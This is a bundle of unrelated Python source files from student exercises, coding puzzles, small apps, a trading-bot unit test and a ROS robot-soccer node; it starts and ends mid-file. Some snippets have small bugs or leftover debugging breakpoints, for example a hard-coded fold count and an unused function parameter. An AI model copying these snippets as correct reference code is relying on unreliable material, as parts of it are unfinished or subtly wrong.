['price', 'amount', 'date'])
|
import sys
"""
Brian Grenier
1545276
bgrenier
List any resources you used below (eg. urls, name of the algorithm from our code archive).
Remember, you are permitted to get help with general concepts about algorithms
and problem solving, but you are not permitted to hunt down solutions to
these particular problems!
N/A
List any classmate you discussed the problem with. Remember, you can only
have high-level verbal discussions. No code should be shared, developed,
or even looked at in these chats. No formulas or pseudocode should be
written or shared in these chats.
N/A
By submitting this code, you are agreeing that you have solved in accordance
with the collaboration policy in CMPUT 403.
"""
if __name__ == '__main__':
places = {}
n = int(input())
for i in range(n):
place, year = input().split()
if place not in places:
places[place] = []
places[place].append(int(year))
for key in places:
places[key].sort()
n = int(input())
for i in range(n):
place, index = input().split()
year = places[place][int(index) - 1]
print(year)
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import numpy as np
import sys
def classifier(data,num_crossval):
train_error=[]
test_error=[]
foldsize= len(data)/num_crossval
for k in range(10):
testing = data[k*foldsize:(k+1)*foldsize]
a=data[:k*foldsize]
b= data[(k+1)*foldsize:]
training = np.concatenate(( a , b))
#apply lda on these
x0= training[training[:, 13]==0]
x0= x0[:,0:-1]
x1= training[training[:, 13]==1]
x1= x1[:,0:-1]
m1=x1.mean(axis=0)
m1=m1.reshape(13,1)
m1=np.transpose(m1)
m0=x0.mean(axis=0)
m0=m0.reshape(13,1)
m0=np.transpose(m0)
sb= (m1-m0)*(m1-m0).T
tempsw1=0;
tempsw0=0
for i in range(len(x1)):
diff= x1[i,:]-m1
tempsw1= tempsw1 + diff*diff.T
for i in range(len(x0)):
diff= x0[i,:]-m0
tempsw0= tempsw0 + diff*diff.T
sw= tempsw0+tempsw1
d=m1-m0
d=d.T
swInv= np.linalg.inv(sw)
w= np.dot(swInv,d)
thresh= np.dot((m1+m0)/2,w)
incorrect=0
for i in range(len(testing)):
label=0
fx= np.dot(testing[i,0:-1],w)
if fx > thresh:
label=1
if label !=testing[i,13]:
incorrect= incorrect+1
#print(incorrect,len(testing) )
errorrate= incorrect/float(len(testing))
test_error.append(errorrate)
incorrect=0
for i in range(len(training)):
label=0
fx= np.dot(training[i,0:-1],w)
if fx > thresh:
label=1
if label !=training[i,13]:
incorrect= incorrect+1
# print(incorrect,len(training) )
e= incorrect/float(len(training))
train_error.append(e)
avg_test_error= np.sum(test_error)/num_crossval
avg_train_error= np.sum(train_error)/num_crossval
testSd= np.sqrt(np.sum((x- avg_test_error)**2 for x in test_error)/float(10))
trainSd=np.sqrt(np.sum((x- avg_train_error)**2 for x in train_error)/float(10))
print('train standard deviation:', trainSd , 'test standard deviation: ', testSd)
return avg_test_error, avg_train_error
filename = sys.argv[1]
num_crossval= int(sys.argv[2])
boston50 = np.genfromtxt(filename , delimiter=',')
boston75 = np.genfromtxt(filename , delimiter=',')
median= np.percentile(boston50[:,13], 50)
thirdquart= np.percentile(boston75[:,13], 75)
boston50[boston50[:, 13] < median, 13] = 0
boston50[boston50[:, 13] >= median, 13] = 1
boston75[boston75[:, 13] < thirdquart, 13] = 0
boston75[boston75[:, 13] >= thirdquart, 13] = 1
print('For Boston 50 :')
teste50, traine50= classifier(boston50,num_crossval)
print("test error percent for boston50 is: ", teste50*100, ' and train error is: ',traine50*100 )
print('For Boston 75 :')
teste75, traine75= classifier(boston75,num_crossval)
print("test error percent for boston75 is: ", teste75*100, ' and train error is: ',traine75*100 )
|
from controller.film_ctrl import FilmCtrl
from controller.client_ctrl import ClientCtrl
from controller.rent_ctrl import RentCtrl
from domain.val_film import FilmValidator
from domain.val_rent import RentValidator
from domain.val_client import ClientValidator
from repository.film_repo import FilmRepo
from repository.rent_repo import RentRepo
from repository.client_repo import ClientRepo
from ui.console import Console
valClient = ClientValidator()
valFilm = FilmValidator()
valGrades = RentValidator()
repoClient = ClientRepo()
repoFilm = FilmRepo()
repoGrade = RentRepo()
ctrlClient = ClientCtrl(valClient, repoClient)
ctrlFilm = FilmCtrl(valFilm, repoFilm)
ctrlRent = RentCtrl(valGrades, repoClient, repoFilm, repoGrade)
console = Console(ctrlClient, ctrlFilm, ctrlRent)
console.startUI()
|
from django.contrib import admin
from .models import *
# Register your models here.
#
# class MenuAdminSite(admin.AdminSite):
#
# def get_app_list(self, request):
# """
# Return a sorted list of all the installed apps that have been
# registered in this site.
# """
# ordering = {
# Unit: 1,
# Jobcategory: 2,
# "Job": 3,
# "Relation": 4,
# "Agecategory": 5,
# "Weightcategory": 6,
# "Bloodpressurecategory": 7,
# "Heartbeatcategory": 8,
# "Healthstatus": 9,
# "Region": 10,
# "Subregion": 11,
# "Countrycategory": 12,
# "Country": 13,
# "District": 14,
# "Ward": 15,
# "Street": 16,
# "Address": 17,
# "Memberinfo": 18,
# "Familyconsume": 19,
# "Objectconsume": 20,
# "Foodcategory": 21,
# "Foodingredient": 22,
# "Balancemeal": 23,
# "Dailymeal": 24,
# "Dailyfamilyconsume": 25,
# "Menusuggest": 26,
# "MenuHistory": 27,
# "MenuActual": 28
# }
# app_dict = self._build_app_dict(request)
#
# # Sort the apps alphabetically.
# app_list = sorted(app_dict.values(), key=lambda x: x['name'].lower())
#
# # Sort the models alphabetically within each app.
#
# for app in app_list:
# app['models'].sort(key=lambda x: ordering[x['name']])
#
# return app_list
#
#
# admin.site = MenuAdminSite()
#
#
admin.site.register(Unit)
admin.site.register(Jobcategory)
admin.site.register(Job)
admin.site.register(Relation)
admin.site.register(Agecategory)
admin.site.register(Weightcategory)
admin.site.register(Bloodpressurecategory)
admin.site.register(Heartbeatcategory)
admin.site.register(Healthstatus)
admin.site.register(Region)
admin.site.register(Subregion)
admin.site.register(Countrycategory)
admin.site.register(Country)
admin.site.register(District)
admin.site.register(Ward)
admin.site.register(Street)
admin.site.register(Address)
admin.site.register(Memberinfo)
admin.site.register(Familyconsume)
admin.site.register(Objectconsume)
admin.site.register(Food)
admin.site.register(Foodchoice)
admin.site.register(Foodcategory)
admin.site.register(Ingredientcategory)
admin.site.register(Ingredient)
admin.site.register(Ingredientcount)
admin.site.register(Foodingredient)
admin.site.register(Balancemeal)
admin.site.register(Dailymeal)
admin.site.register(Dailyfamilyconsume)
admin.site.register(Menusuggest)
admin.site.register(MenuHistory)
admin.site.register(MenuActual)
admin.site.register(Comment)
|
__author__ = 'OTL'
import pygame
from pygame.locals import *
import resources
import noise_surfaces
# TODO add buttons
class MenuItem():
def __init__(self, caption, new_state):
self.caption = caption
self.text_normal = resources.get_font(40).render(caption, True, (128,255,128))
self.text_highlight = resources.get_font(50).render(caption, True, (255,255,255))
self.text_surface = self.text_normal
self.new_state = new_state
self.rect = self.text_surface.get_rect()
# self.rect.left = x
# self.rect.top = y
class Menu():
def __init__(self, state, top=100):
self.state = state
self.menu_selected = None
self.menu_items = []
self.top = top
def draw(self, screen):
# Draw the menu items
for item in self.menu_items:
screen.blit(item.text_surface, item.rect)
def do_event(self, event):
if event.type == MOUSEMOTION:
mouse_pos = pygame.mouse.get_pos()
self.menu_selected = None
for item in self.menu_items:
if item.rect.collidepoint(mouse_pos):
item.text_surface = item.text_highlight
self.menu_selected = item
else:
item.text_surface = item.text_normal
if event.type == MOUSEBUTTONUP:
if self.menu_selected is not None:
print(self.menu_selected.caption)
self.state.next_state = self.menu_selected.new_state
def add_item(self, menu_item):
menu_item.rect.center = self.state.screen.get_rect().center
if len(self.menu_items) > 0:
menu_item.rect.top = self.menu_items[-1].rect.top + (self.menu_items[-1].rect.height * 1.5)
else:
menu_item.rect.top = self.top
self.menu_items.append(menu_item)
class MainMenu():
def __init__(self,screen):
self.screen = screen
self.next_state = "this"
# Create the menu
self.menu = Menu(self, 300)
self.menu.add_item(MenuItem("Play", "main"))
self.menu.add_item(MenuItem("Quit", "quit"))
self.background = noise_surfaces.Animated_perlin_surface()
self.background.init(50)
def update(self):
self.background.update()
pass
def draw(self):
# self.screen.fill((0,0,0))
self.background.draw(self.screen)
text = resources.get_font(60).render("Begemmed!", True, (128, 255, 128))
textpos = text.get_rect(center = self.screen.get_rect().center)
textpos.y = 100
self.screen.blit(text, textpos)
text = resources.get_font(35).render("by Oliver Lomax", True, (128, 255, 128))
# textpos = text.get_rect(center = self.screen.get_rect().center)
textpos.y += 100
self.screen.blit(text, textpos)
text = resources.get_font(25).render("Music by Visager", True, (128, 255, 128))
textpos = text.get_rect(center = self.screen.get_rect().center)
textpos.y += 300
self.screen.blit(text, textpos)
# Draw the menu items
self.menu.draw(self.screen)
def do_event(self, event):
if event.type == KEYUP:
if event.key == K_SPACE:
self.next_state = "main"
# Send events to the menu
self.menu.do_event(event)
class GameOver():
def __init__(self,screen):
self.screen = screen
self.next_state = "this"
resources.play_sound("die")
def update(self):
pass
def draw(self):
# Create the fading background effect
screen_rect = self.screen.get_rect()
filler = pygame.Surface((screen_rect.width, screen_rect.height), pygame.SRCALPHA, 32)
filler.fill((100,100,100,10))
self.screen.blit(filler, (0,0))
text = resources.get_font(50).render("Game Over!", True, (0, 200, 0))
textpos = text.get_rect(center = self.screen.get_rect().center)
self.screen.blit(text, textpos)
text = resources.get_font(20).render("Press any key to continue", True, (0, 200, 0))
textpos = text.get_rect(center = self.screen.get_rect().center)
textpos.y += 300
self.screen.blit(text, textpos)
def do_event(self, event):
if event.type == KEYUP:
# if event.key == K_SPACE:
self.next_state = "menu"
|
import numpy as np
import pandas as pd
import ipdb
import cPickle as pickle
import matplotlib.pyplot as plt
plt.style.use("ggplot")
import mpld3
from mpld3 import plugins
from mpld3.utils import get_id
### My plotting code.
xw, yw = pickle.load(open("media/xw.cpkl")), pickle.load(open("media/yw.cpkl"))
xb, yb = pickle.load(open("media/xb.cpkl")), pickle.load(open("media/yb.cpkl"))
labels = ["GSW", "CHI"]
fig = plt.figure(figsize=(13, 10))
ax1 = fig.add_subplot(2,1,1)
ax2 = fig.add_subplot(2,1,2)
l1 = ax1.plot(xw, yw, lw=2,)
xsamples = range(0, len(xw), 100)
s1 = ax2.plot(np.array(xw)[xsamples], np.array(yw)[xsamples], 'o', ms=8, )
l1.extend(ax1.plot(xb, yb, lw=2,))
xsamples = range(0, len(xb), 100)
s1.extend(ax2.plot(np.array(xb)[xsamples], np.array(yb)[xsamples], 'o', ms=8, ))
### Their plotting code.
# N_paths = 5
# N_steps = 100
#
# x = np.linspace(0, 10, 100)
# y = 0.1 * (np.random.random((N_paths, N_steps)) - 0.5)
# y = y.cumsum(1)
#
#
# fig = plt.figure()
# ax1 = fig.add_subplot(2,1,1)
# ax2 = fig.add_subplot(2,1,2)
#
# labels = ["a", "b", "c", "d", "e"]
# l1 = ax1.plot(x, y.T, marker='x',lw=2, alpha=0.1)
# s1 = ax2.plot(x, y.T, 'o', ms=8, alpha=0.1)
ipdb.set_trace()
ilp = plugins.InteractiveLegendPlugin(zip(l1, s1), labels)
ilp.JAVASCRIPT = """
mpld3.register_plugin("interactive_legend", InteractiveLegend);
InteractiveLegend.prototype = Object.create(mpld3.Plugin.prototype);
InteractiveLegend.prototype.constructor = InteractiveLegend;
InteractiveLegend.prototype.requiredProps = ["element_ids", "labels"];
InteractiveLegend.prototype.defaultProps = {"ax":null,
"alpha_unsel":0.2,
"alpha_over":1.0,
"start_visible":true}
function InteractiveLegend(fig, props){
mpld3.Plugin.call(this, fig, props);
};
InteractiveLegend.prototype.draw = function(){
var alpha_unsel = this.props.alpha_unsel;
var alpha_over = this.props.alpha_over;
var legendItems = new Array();
for(var i=0; i<this.props.labels.length; i++){
var obj = {};
console.log("HELLO THERE");
setTimeout(function(){debugger;}, 3000);
obj.label = this.props.labels[i];
var element_id = this.props.element_ids[i];
mpld3_elements = [];
debugger;
for(var j=0; j<element_id.length; j++){
var mpld3_element = mpld3.get_element(element_id[j], this.fig);
// mpld3_element might be null in case of Line2D instances
// for we pass the id for both the line and the markers. Either
// one might not exist on the D3 side
if(mpld3_element){
mpld3_elements.push(mpld3_element);
}
}
obj.mpld3_elements = mpld3_elements;
obj.visible = this.props.start_visible[i]; // should become be setable from python side
legendItems.push(obj);
set_alphas(obj, false);
}
// determine the axes with which this legend is associated
var ax = this.props.ax
if(!ax){
ax = this.fig.axes[0];
} else{
ax = mpld3.get_element(ax, this.fig);
}
// add a legend group to the canvas of the figure
var legend = this.fig.canvas.append("svg:g")
.attr("class", "legend");
// add the rectangles
legend.selectAll("rect")
.data(legendItems)
.enter().append("rect")
.attr("height", 10)
.attr("width", 25)
.attr("x", ax.width + ax.position[0] + 25)
.attr("y",function(d,i) {
return ax.position[1] + i * 25 + 10;})
.attr("stroke", get_color)
.attr("class", "legend-box")
.style("fill", function(d, i) {
return d.visible ? get_color(d) : "white";})
.on("click", click).on('mouseover', over).on('mouseout', out);
// add the labels
legend.selectAll("text")
.data(legendItems)
.enter().append("text")
.attr("x", function (d) {
return ax.width + ax.position[0] + 25 + 40;})
.attr("y", function(d,i) {
return ax.position[1] + i * 25 + 10 + 10 - 1;})
.text(function(d) { return d.label });
// specify the action on click
function click(d,i){
d.visible = !d.visible;
d3.select(this)
.style("fill",function(d, i) {
return d.visible ? get_color(d) : "white";
})
set_alphas(d, false);
};
// specify the action on legend overlay
function over(d,i){
set_alphas(d, true);
};
// specify the action on legend overlay
function out(d,i){
set_alphas(d, false);
};
// helper function for setting alphas
function set_alphas(d, is_over){
for(var i=0; i<d.mpld3_elements.length; i++){
var type = d.mpld3_elements[i].constructor.name;
if(type =="mpld3_Line"){
var current_alpha = d.mpld3_elements[i].props.alpha;
var current_alpha_unsel = current_alpha * alpha_unsel;
var current_alpha_over = current_alpha * alpha_over;
d3.select(d.mpld3_elements[i].path[0][0])
.style("stroke-opacity", is_over ? current_alpha_over :
(d.visible ? current_alpha : current_alpha_unsel))
.style("stroke-width", is_over ?
alpha_over * d.mpld3_elements[i].props.edgewidth : d.mpld3_elements[i].props.edgewidth);
} else if((type=="mpld3_PathCollection")||
(type=="mpld3_Markers")){
var current_alpha = d.mpld3_elements[i].props.alphas[0];
var current_alpha_unsel = current_alpha * alpha_unsel;
var current_alpha_over = current_alpha * alpha_over;
d3.selectAll(d.mpld3_elements[i].pathsobj[0])
.style("stroke-opacity", is_over ? current_alpha_over :
(d.visible ? current_alpha : current_alpha_unsel))
.style("fill-opacity", is_over ? current_alpha_over :
(d.visible ? current_alpha : current_alpha_unsel));
} else{
console.log(type + " not yet supported");
}
}
};
// helper function for determining the color of the rectangles
function get_color(d){
var type = d.mpld3_elements[0].constructor.name;
var color = "black";
if(type =="mpld3_Line"){
color = d.mpld3_elements[0].props.edgecolor;
} else if((type=="mpld3_PathCollection")||
(type=="mpld3_Markers")){
color = d.mpld3_elements[0].props.facecolors[0];
} else{
console.log(type + " not yet supported");
}
return color;
};
};
"""
plugins.connect(fig, ilp)
#mpld3.display()
mpld3.show()
|
from math import sqrt
def isPrime(x):
if x == 1:
return False
if x == 2:
return True
root = int(sqrt(x)) + 1
for i in range(2, root+1):
if x % i == 0:
return False
return True
def numPrimeDivisors(num):
if isPrime(num):
return 1 # Not quite true, but makes things easier
for i in range(2, num//2 +1):
if num % i == 0:
while num % i == 0:
num = num // i
return 1+numPrimeDivisors(num)
return 0
i = 5
d = {i: numPrimeDivisors(i), i+1: numPrimeDivisors(i+1), i+2: numPrimeDivisors(i+2), i+3: numPrimeDivisors(i+3)}
while [d[j] for j in range(i, i+4)] != [4, 4, 4, 4]:
d[i+4] = numPrimeDivisors(i+4)
i += 1
print(i)
|
from skimage import data, segmentation, color, io, exposure
from minisom import MiniSom
import numpy as np
import argparse
# get color histogram of each superpixel, no normalized
def get_color_histogram(image, superpixels, index):
indices = np.where(superpixels.ravel() == index)[0]
_r_hist = np.bincount(image[:, :, 0].ravel()[indices], minlength=256)
_g_hist = np.bincount(image[:, :, 1].ravel()[indices], minlength=256)
_b_hist = np.bincount(image[:, :, 2].ravel()[indices], minlength=256)
return _r_hist, _g_hist, _b_hist
# get grayscale histogram of each superpixel, not normalized
def get_grayscale_histogram(image, superpixels, index):
indices = np.where(superpixels.ravel() == index)[0]
_gray_hist = np.bincount(image[:, :].ravel()[indices], minlength=256)
return _gray_hist
parser = argparse.ArgumentParser()
parser.add_argument('input_image', type=str, help='input image path')
parser.add_argument('num_superpixel', type=int, help='number of segments')
parser.add_argument('compactness', type=int, help='compactness param of SLIC')
args = parser.parse_args()
img = data.coffee()
#img = io.imread(args.input_image)
labels = segmentation.slic(img, n_segments=args.num_superpixel, compactness=args.compactness)
out1 = color.label2rgb(labels, img, kind='avg')
#print(labels.shape)
#print(np.unique(labels))
io.imshow(out1)
io.show()
out1_gray = color.rgb2gray(out1)
io.imshow(out1_gray)
io.show()
hist = np.zeros((np.max(labels), 256), dtype=float)
#print(hist.shape)
for i in range(np.max(labels)):
gray_hist = get_grayscale_histogram(img, labels, i)
gray_hist = np.float32(gray_hist / gray_hist.sum())
hist[i, :] = gray_hist
print(hist.shape)
'''
for i in range(np.max(labels)):
r_hist, g_hist, b_hist = get_color_histogram(img, labels, i)
hist[i][0] = r_hist
hist[i][1] = g_hist
hist[i][2] = b_hist
#hist[i][0], hist[i][1], hist[i][2] = get_color_histogram(img, labels, i)
'''
print('training...')
som = MiniSom(5, 5, 256, sigma=0.5, learning_rate=0.2, neighborhood_function='gaussian')
som.random_weights_init(hist)
starting_weights = som.get_weights().copy() # saving the starting weights
som.train_random(hist, 1000, verbose=True)
#print('quantization...')
#qnt = som.quantization(hist) # quantize each pixels of the image
#print('building new image...')
print('done.')
print(starting_weights.shape)
io.imshow(starting_weights)
io.show()
io.imshow(som.get_weights())
io.show()
|
# https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV_XEokaAEcDFAX7&
# 이분탐색
# 시간이 있으면 해당 시간동안 통과한 사람의 수를 알 수 있다.
def solution(n, times):
left = 1
right = n * max(times) + 1
while left <= right:
mid = (left+right) // 2
res = 0
for i in range(len(times)):
res += mid // times[i]
if res < n:
left = mid + 1
else:
right = mid - 1
return left
for T in range(int(input())):
N, M = map(int,input().split())
t = []
for i in range(N):
t.append(int(input()))
print('#',end='')
print(T+1,solution(M,t))
|
#-*- coding:utf-8 -*-
# leetcode 25
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
def to_list(self):
return [self.val] + self.next.to_list() if self.next else [self.val]
class Solution(object):
def reverseKGroup(self, head, k):
pre, cur = head, head
stack = []
while cur:
while cur and k > 0:
stack.append(cur.val)
cur = cur.next
k -= 1
if k > 0: return head
while len(stack) > 0:
pre.val = stack.pop(-1)
pre = pre.next
k += 1
return head
if __name__ == "__main__":
n1 = ListNode(1)
n2 = ListNode(4)
n3 = ListNode(5)
n4 = ListNode(2)
n5 = ListNode(3)
n6 = ListNode(6)
n1.next = n2
n2.next = n3
n3.next = n4
n4.next = n5
n5.next = n6
print n1.to_list()
r = Solution().reverseKGroup(n1, 2)
print r.to_list()
|
#!/usr/bin/python3
"""
PE005: Smallest multiple
2520 is the smallest number that can be divided by each of the numbers
from 1 to 10 without any remainder.
What is the smallest positive number that is evenly divisible by
all of the numbers from 1 to 20?
"""
import functools
from .utils import lcm
def main(n=20):
""" Return the smallest integer evenly divisible by all 1 <= k <= n. """
return functools.reduce(lcm, range(1, 20))
|
"""
Ejercicio 3: programa que compruebe si una variable está vacía.
Y si está vacía rellenarla con texto en minúscula y mostrarlo en mayúsculas.
"""
# comprobar variable
texto = ""
if len(texto.strip()) <= 0:
print("La variable está vacía")
else:
print("La variable tiene contenido", len(texto))
variable_vacia = "piletazo"
if len(texto) <= 0:
print(variable_vacia)
print(variable_vacia.upper())
|
import asyncio
from decimal import Decimal
from typing import Awaitable, Optional
from unittest import TestCase
from hummingbot.client.config.client_config_map import ClientConfigMap
from hummingbot.client.config.config_helpers import ClientConfigAdapter
from hummingbot.connector.exchange.bitfinex.bitfinex_exchange import BitfinexExchange
from hummingbot.core.data_type.common import OrderType, TradeType
from hummingbot.core.data_type.trade_fee import TokenAmount
from hummingbot.core.event.event_logger import EventLogger
from hummingbot.core.event.events import MarketEvent, OrderFilledEvent
class BitfinexExchangeTests(TestCase):
# the level is required to receive logs from the data source logger
level = 0
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.base_asset = "COINALPHA"
cls.quote_asset = "HBOT"
cls.trading_pair = f"{cls.base_asset}-{cls.quote_asset}"
cls.symbol = f"{cls.base_asset}{cls.quote_asset}"
cls.listen_key = "TEST_LISTEN_KEY"
def setUp(self) -> None:
super().setUp()
self.log_records = []
self.test_task: Optional[asyncio.Task] = None
self.client_config_map = ClientConfigAdapter(ClientConfigMap())
self.exchange = BitfinexExchange(
client_config_map=self.client_config_map,
bitfinex_api_key="testAPIKey",
bitfinex_secret_key="testSecret",
trading_pairs=[self.trading_pair],
)
self.exchange.logger().setLevel(1)
self.exchange.logger().addHandler(self)
self._initialize_event_loggers()
def tearDown(self) -> None:
self.test_task and self.test_task.cancel()
super().tearDown()
def _initialize_event_loggers(self):
self.buy_order_completed_logger = EventLogger()
self.sell_order_completed_logger = EventLogger()
self.order_filled_logger = EventLogger()
events_and_loggers = [
(MarketEvent.BuyOrderCompleted, self.buy_order_completed_logger),
(MarketEvent.SellOrderCompleted, self.sell_order_completed_logger),
(MarketEvent.OrderFilled, self.order_filled_logger)]
for event, logger in events_and_loggers:
self.exchange.add_listener(event, logger)
def handle(self, record):
self.log_records.append(record)
def _is_logged(self, log_level: str, message: str) -> bool:
return any(record.levelname == log_level and record.getMessage() == message for record in self.log_records)
def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1):
ret = asyncio.get_event_loop().run_until_complete(asyncio.wait_for(coroutine, timeout))
return ret
def test_order_fill_event_takes_fee_from_update_event(self):
self.exchange.start_tracking_order(
order_id="OID1",
trading_pair=self.trading_pair,
order_type=OrderType.LIMIT,
trade_type=TradeType.BUY,
price=Decimal("10000"),
amount=Decimal("1"),
)
order = self.exchange.in_flight_orders.get("OID1")
order.update_exchange_order_id("34938060782")
partial_fill = [
0, # CHAN_ID
"tu", # TYPE
[
1, # ID
f"t{self.trading_pair}", # SYMBOL
1574963975602, # MTS_CREATE
34938060782, # ORDER_ID
0.1, # EXEC_AMOUNT
10053.57, # EXEC_PRICE
"LIMIT", # ORDER_TYPE
0, # ORDER_PRICE
-1, # MAKER
10.0, # FEE
"USDT", # FEE_CURRENCY
0 # CID
]
]
self.exchange._process_trade_event(event_message=partial_fill)
self.assertEqual(partial_fill[2][10], order.fee_asset)
self.assertEqual(Decimal(str(partial_fill[2][9])), order.fee_paid)
self.assertEqual(1, len(self.order_filled_logger.event_log))
fill_event: OrderFilledEvent = self.order_filled_logger.event_log[0]
self.assertEqual(Decimal("0"), fill_event.trade_fee.percent)
self.assertEqual(
[TokenAmount(partial_fill[2][10], Decimal(str(partial_fill[2][9])))], fill_event.trade_fee.flat_fees
)
self.assertTrue(self._is_logged(
"INFO",
f"Order filled {Decimal(str(partial_fill[2][4]))} out of {order.amount} of the "
f"{order.order_type_description} order {order.client_order_id}"
))
self.assertEqual(0, len(self.buy_order_completed_logger.event_log))
complete_fill = [
0, # CHAN_ID
"tu", # TYPE
[
2, # ID
f"t{self.trading_pair}", # SYMBOL
1574963975602, # MTS_CREATE
34938060782, # ORDER_ID
0.9, # EXEC_AMOUNT
10060.0, # EXEC_PRICE
"LIMIT", # ORDER_TYPE
0, # ORDER_PRICE
-1, # MAKER
20.0, # FEE
"USDT", # FEE_CURRENCY
0 # CID
]
]
self.exchange._process_trade_event(event_message=complete_fill)
self.assertEqual(complete_fill[2][10], order.fee_asset)
self.assertEqual(Decimal(30), order.fee_paid)
self.assertEqual(2, len(self.order_filled_logger.event_log))
fill_event: OrderFilledEvent = self.order_filled_logger.event_log[1]
self.assertEqual(Decimal("0"), fill_event.trade_fee.percent)
self.assertEqual([TokenAmount(complete_fill[2][10], Decimal(complete_fill[2][9]))],
fill_event.trade_fee.flat_fees)
self.assertTrue(self._is_logged(
"INFO",
f"The market {order.trade_type.name.lower()} "
f"order {order.client_order_id} has completed "
"according to Bitfinex user stream."
))
self.assertEqual(1, len(self.buy_order_completed_logger.event_log))
|
#!/usr/bin/env python2
# coding: UTF-8
import rospy
import math
from consai2_msgs.msg import VisionGeometry
from consai2_msgs.msg import BallInfo, RobotInfo
from consai2_msgs.msg import DecodedReferee
from consai2_msgs.msg import ControlTarget
from geometry_msgs.msg import Pose2D
import referee_wrapper as ref
import avoidance
from actions import tool, offense, goalie, normal, ball_placement
from field import Field
from observer import Observer
import role
import assign
class RobotNode(object):
def __init__(self, robot_id):
self._MY_ID = robot_id
self._control_target = ControlTarget()
self._control_target.robot_id = robot_id
self._control_target.control_enable = False
self._my_pose = Pose2D()
self._my_velocity = Pose2D()
self._is_attacker = False
self._is_goalie = False
# 0 is goalie, 1 is attacker, 2~7 is defense
self._my_role = 1
def set_state(self, pose, velocity):
self._my_pose = pose
self._my_velocity = velocity
def set_goalie(self):
self._is_goalie = True
def get_sleep(self):
# 制御を停止する
self._control_target.control_enable = False
return self._control_target
def get_action(self, referee, obstacle_avoidance, ball_info, robot_info=None, defense_num=0):
self._control_target.control_enable = True
remake_path = False # 経路再生成のフラグ TODO:remake_pathを活用する
avoid_obstacle = True # 障害物回避の経路追加フラグ
avoid_ball = False # ボール回避の経路追加フラグ
zone_enable = False
# パラメータ初期化
self._control_target.dribble_power = 0.0
self._control_target.kick_power = 0.0
if referee.can_move_robot is False or ball_info.disappeared:
# 移動禁止 or ボールの消失で制御を停止する
rospy.logdebug("HALT")
self._control_target, remake_path= normal.stop(self._control_target)
avoid_obstacle = False # 障害物回避しない
elif referee.is_inplay:
rospy.logdebug("IN-PLAY")
zone_enable = True
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
if tool.is_in_defense_area(ball_info.pose, 'our'):
self._control_target = offense.outside_shoot(
self._my_pose, ball_info, self._control_target)
else:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
if tool.is_in_defense_area(ball_info.pose, 'our'):
# ボールが自チームのディフェンスエリアにある場合は行動を変える
self._control_target = normal.move_to(
self._control_target, Pose2D(0,0,0), ball_info, look_ball=True)
elif tool.is_in_defense_area(ball_info.pose, 'their'):
# ボールが相手チームのディフェンスエリアにある場合は行動を変える
self._control_target = normal.keep_x(
self._control_target,
Field.penalty_pose('their', 'upper_front').x - 1.0,
ball_info)
else:
self._control_target = offense.inplay_shoot(
self._my_pose, ball_info, self._control_target)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info, zone_enable)
else:
if referee.referee_id == ref.REFEREE_ID["STOP"]:
rospy.logdebug("STOP")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.7)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_KICKOFF_PREPARATION"]:
rospy.logdebug("OUR_KICKOFF_PREPARATION")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=False)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_KICKOFF_START"]:
rospy.logdebug("OUR_KICKOFF_START")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_PENALTY_PREPARATION"]:
rospy.logdebug("OUR_PENALTY_PREPARATION")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=False)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_PENALTY_START"]:
rospy.logdebug("OUR_PENALTY_START")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=True, penalty=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_DIRECT_FREE"]:
rospy.logdebug("OUR_DIRECT_FREE")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_pass(
